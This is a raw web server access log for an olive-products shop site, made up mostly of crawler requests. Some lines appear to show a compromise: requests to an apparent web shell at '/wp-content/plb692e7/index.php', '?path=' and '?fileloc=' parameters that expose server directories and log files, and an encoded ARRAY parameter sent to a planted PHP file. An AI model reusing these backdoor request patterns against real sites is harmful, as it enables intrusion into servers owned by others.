20.171.207.76 - - [30/Sep/2025:06:47:46 +0000] "GET /2014177457?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.8 - - [30/Sep/2025:06:47:46 +0000] "POST /get-message-notify HTTP/1.0" 200 22732 "https://aceitunaslosada.com/?351105801?items=0350658174" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.128 - - [30/Sep/2025:06:47:46 +0000] "GET /539947651?items=0539258846 HTTP/1.0" 200 22984 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.128 - - [30/Sep/2025:06:47:47 +0000] "POST /get-message-notify HTTP/1.0" 200 22750 "https://www.aceitunaslosada.com/1086551117?items=1085164222" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:47 +0000] "GET /2014211899?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:48 +0000] "GET /1841359977?items=1839009086 HTTP/1.0" 200 23179 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:47:48 +0000] "GET /1378476969?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:49 +0000] "GET /2014323354?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:49 +0000] "GET /1859454573?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.128 - - [30/Sep/2025:06:47:49 +0000] "POST /get-message-notify HTTP/1.0" 200 22750 "https://www.aceitunaslosada.com/539947651?items=0539258846" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.128 - - [30/Sep/2025:06:47:49 +0000] "GET /82024980?items=0081921006 HTTP/1.0" 200 23925 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
44.221.180.179 - - [30/Sep/2025:06:47:50 +0000] "GET /producto/aceituna-cornicabra-natural/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/cache/page_enhanced/www.aceitunaslosada.com//0 HTTP/1.0" 200 6923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:47:50 +0000] "GET /2014474202?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:51 +0000] "GET /1604568249?items=1602519774 HTTP/1.0" 200 24352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:51 +0000] "GET /2014121097?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:51 +0000] "GET /1382499788?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:52 +0000] "GET /1604526467?items=1602478046 HTTP/1.0" 200 24688 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:52 +0000] "GET /2013902592?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
173.208.176.202 - - [30/Sep/2025:06:46:25 +0000] "GET /wp-content/plb692e7/index.php?id=222090 HTTP/1.0" 200 3528 "-" "GuzzleHttp/7"
20.171.207.168 - - [30/Sep/2025:06:47:53 +0000] "GET /1390379627?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:54 +0000] "GET /2014048250?fileloc=/var/www/vhosts/aceitunaslosada.com/logs/access_ssl_log.processed&path=/var/www/vhosts/aceitunaslosada.com/logs HTTP/1.0" 200 6389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.216.13.10 - - [30/Sep/2025:06:47:54 +0000] "GET /producto/aceituna-gordal-rellena-de-alcaparrita/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/LayerSlider/assets/wp HTTP/1.0" 200 7381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.168 - - [30/Sep/2025:06:47:54 +0000] "GET /1922630649?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:55 +0000] "GET /2014153425?path=/var/www/vhosts/aceitunaslosada.com/httpdocs HTTP/1.0" 200 6684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:55 +0000] "GET /1604516294?items=1602467886 HTTP/1.0" 200 24995 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:47:55 +0000] "GET /1027730587?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:56 +0000] "GET /2014104098?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:57 +0000] "GET /1604521516?items=1602473102 HTTP/1.0" 200 23533 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:57 +0000] "GET /2014045110?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.7.13.143 - - [30/Sep/2025:06:47:58 +0000] "GET /producto/aceituna-picolimon-natural/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-includes/blocks/latest-posts HTTP/1.0" 200 6743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.168 - - [30/Sep/2025:06:47:58 +0000] "GET /1369128726?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:58 +0000] "GET /2014480484?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:59 +0000] "GET /2014410811?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:00 +0000] "GET /1841450779?items=1839099774 HTTP/1.0" 200 23140 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:01 +0000] "GET /2014025549?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.217.82.254 - - [30/Sep/2025:06:48:01 +0000] "GET /producto/mix-de-aceitunas-naturales-sin-hueso-2/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts HTTP/1.0" 200 6926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.137 - - [30/Sep/2025:06:48:02 +0000] "GET /1657185030?items=1655069358 HTTP/1.0" 200 24381 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:48:02 +0000] "GET /1389891547?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
82.223.111.37 - - [30/Sep/2025:06:46:04 +0000] "GET /wp-content/cache/page_enhanced/aceitunaslosada.com/development044014203.html/development044014203.html/index.php?ARRAY=7o2230223n313735393231383336342p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313735393231343736342q6363353064623066333364363738323738626436396538363662363536356336222p2232223n226233626465323266356466366638343865346261386561336238326131633232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34382q35362q36342q37372q39302q3236227q HTTP/1.0" 504 3843 "-" "-"
20.171.207.168 - - [30/Sep/2025:06:48:03 +0000] "GET /2198131542?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:04 +0000] "GET /1657194964?items=1655079278 HTTP/1.0" 200 25352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:05 +0000] "GET /2014544660?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.231.118.144 - - [30/Sep/2025:06:48:05 +0000] "GET /producto/aceituna-picolimon-natural/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/wp-file-manager/lib/php/flycache HTTP/1.0" 200 6498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.137 - - [30/Sep/2025:06:48:06 +0000] "GET /1086157493?items=1084771102 HTTP/1.0" 200 23004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:48:06 +0000] "GET /1193659749?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:08 +0000] "GET /2309108491?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:48:08 +0000] "GET /2014188413?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:09 +0000] "GET /1083755257?items=1082371934 HTTP/1.0" 200 23167 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:48:09 +0000] "GET /1595459608?path=/var HTTP/1.0" 200 6372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.148.123 - - [30/Sep/2025:06:48:10 +0000] "GET /producto/aceituna-picolimon-natural/?fileloc=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/borderlesslight/index.php&path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/borderlesslight HTTP/1.0" 200 6497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.136 - - [30/Sep/2025:06:48:09 +0000] "GET /501219471?items=0500580126 HTTP/1.0" 200 25788 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
20.171.207.76 - - [30/Sep/2025:06:48:10 +0000] "GET /2014247947?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:10 +0000] "GET /1351707261?path=/var HTTP/1.0" 200 6372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:48:12 +0000] "GET /2014142740?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:12 +0000] "GET /1315934599?items=1314254750 HTTP/1.0" 200 27420 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:48:12 +0000] "GET /1997386829?path=/var HTTP/1.0" 200 6372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.8 - - [30/Sep/2025:06:48:13 +0000] "GET /112943026?items=0112799566 HTTP/1.0" 200 24057 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.2 - - [30/Sep/2025:06:48:12 +0000] "GET /857071816?items=0855977998 HTTP/1.0" 200 25535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
100.29.160.53 - - [30/Sep/2025:06:48:14 +0000] "GET /producto/aceituna-gordal-rellena-de-jalapeno/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca HTTP/1.0" 200 6882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.136 - - [30/Sep/2025:06:48:14 +0000] "GET /1316155120?items=1314474990 HTTP/1.0" 200 25265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:14 +0000] "GET /2013889311?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:16 +0000] "GET /1014396836?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:16 +0000] "GET /1973184269?items=1970665022 HTTP/1.0" 200 24800 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:17 +0000] "GET /2014255492?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:17 +0000] "GET /1316180449?items=1314500286 HTTP/1.0" 200 24546 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.210.223.61 - - [30/Sep/2025:06:48:18 +0000] "GET /aviso-legal/?path=/var/www/vhosts/aceitunaslosada.com/web/copia/wp-content/plugins/sitepress-multilingual-cms/classes/media/duplication HTTP/1.0" 200 7049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:48:19 +0000] "GET /2014515952?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 3528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:18 +0000] "GET /1536159328?path=/var HTTP/1.0" 200 6372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:20 +0000] "GET /1788109695?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:48:20 +0000] "GET /2014120551?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
204.12.208.18 - - [30/Sep/2025:06:48:20 +0000] "GET /wp-content/plb692e7/index.php HTTP/1.0" 200 3602 "http://aceitunaslosada.com/wp-content/plb692e7/index.php" "Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.9.168 Version/11.50"
66.249.79.136 - - [30/Sep/2025:06:48:20 +0000] "GET /1316152012?items=1314471886 HTTP/1.0" 200 26007 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [30/Sep/2025:06:48:21 +0000] "GET /serving283002620.html HTTP/1.0" 200 22813 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
18.213.70.100 - - [30/Sep/2025:06:48:21 +0000] "GET /producto/aceituna-manzanilla-sin-hueso-2/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/promises/src HTTP/1.0" 200 7583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:48:22 +0000] "GET /2014443139?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:22 +0000] "GET /2215663197?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:22 +0000] "GET /1688814851?items=1686658782 HTTP/1.0" 200 24367 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:23 +0000] "GET /2014544660?path=/var/www/vhosts/aceitunaslosada.com/.composer HTTP/1.0" 200 6826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:48:24 +0000] "GET /2033554892?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
82.223.111.37 - - [30/Sep/2025:06:46:25 +0000] "GET /wp-content/cache/page_enhanced/aceitunaslosada.com/development044014203.html/development044014203.html/index.php?ARRAY=7o2230223n313735393231383338352p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313735393231343738352q3838663262353736623662333333306262333336643866336666663166303436222p2232223n226233626465323266356466366638343865346261386561336238326131633232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34382q35362q36342q37372q39302q3236227q HTTP/1.0" 504 3843 "-" "-"
66.249.79.136 - - [30/Sep/2025:06:48:24 +0000] "GET /product/edit/A261883170 HTTP/1.0" 200 24700 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.136 - - [30/Sep/2025:06:48:24 +0000] "GET /325863485?items=0325448094 HTTP/1.0" 200 24074 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.136 - - [30/Sep/2025:06:48:24 +0000] "GET /1999273813?items=1996721246 HTTP/1.0" 200 25115 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:48:24 +0000] "GET /2014520423?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:48:25 +0000] "GET /2247207404?items=2244338190 HTTP/1.0" 200 24602 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:48:26 +0000] "GET /1238548631?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.44.174.136 - - [30/Sep/2025:06:48:26 +0000] "GET /producto/mix-de-aceitunas-naturales-sin-hueso/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/cache/page_enhanced/www.aceitunaslosada.com/5fzzgfeke8i HTTP/1.0" 200 6828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:48:27 +0000] "GET /2014313727?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.8 - - [30/Sep/2025:06:48:26 +0000] "POST /get-message-notify HTTP/1.0" 200 24769 "https://aceitunaslosada.com/serving283002620.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
